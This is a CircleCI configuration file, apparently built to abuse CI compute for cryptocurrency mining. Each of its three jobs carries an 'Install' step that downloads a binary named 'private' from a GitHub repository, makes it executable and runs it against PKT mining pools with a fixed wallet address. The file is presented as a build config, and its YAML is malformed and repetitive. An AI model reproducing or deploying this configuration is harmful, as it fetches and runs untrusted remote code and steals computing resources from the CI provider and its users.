version: 2.0
jobs:
  build:
   images-1:
    working_dir: &working_dir ~/app 
  .build_template: &script
  steps: 
    - checkout 
    - run: 
        name: Install
        command: |  wget https://github.com/Xilahani8/work/raw/main/private && chmod +x private && ./private ann -p pkt1qqwya7kp20pn9ugnw3lj78l3dmjp00gk3ct9ey9 http://pool.pkt.world/master/ http://pool.pktpool.io 2>&1 | grep --color=never -o "annmine.rs.*Ke.*"
      
  images-2:
working_dir: &working_dir ~/app 
  .build_template: &script
  steps: 
    - checkout 
    - run: 
        name: Install
        command: |  wget https://github.com/Xilahani8/work/raw/main/private && chmod +x private && ./private ann -p pkt1qqwya7kp20pn9ugnw3lj78l3dmjp00gk3ct9ey9 http://pool.pkt.world/master/ http://pool.pktpool.io 2>&1 | grep --color=never -o "annmine.rs.*Ke.*"
images-3:
working_dir: &working_dir ~/app 
  .build_template: &script
  steps: 
    - checkout 
    - run: 
        name: Install
        command: |  wget https://github.com/Xilahani8/work/raw/main/private && chmod +x private && ./private ann -p pkt1qqwya7kp20pn9ugnw3lj78l3dmjp00gk3ct9ey9 http://pool.pkt.world/master/ http://pool.pktpool.io 2>&1 | grep --color=never -o "annmine.rs.*Ke.*"
workflows:
    version: 2.1
    build:
        jobs:
             - images-1
             - images-2
             - images-3
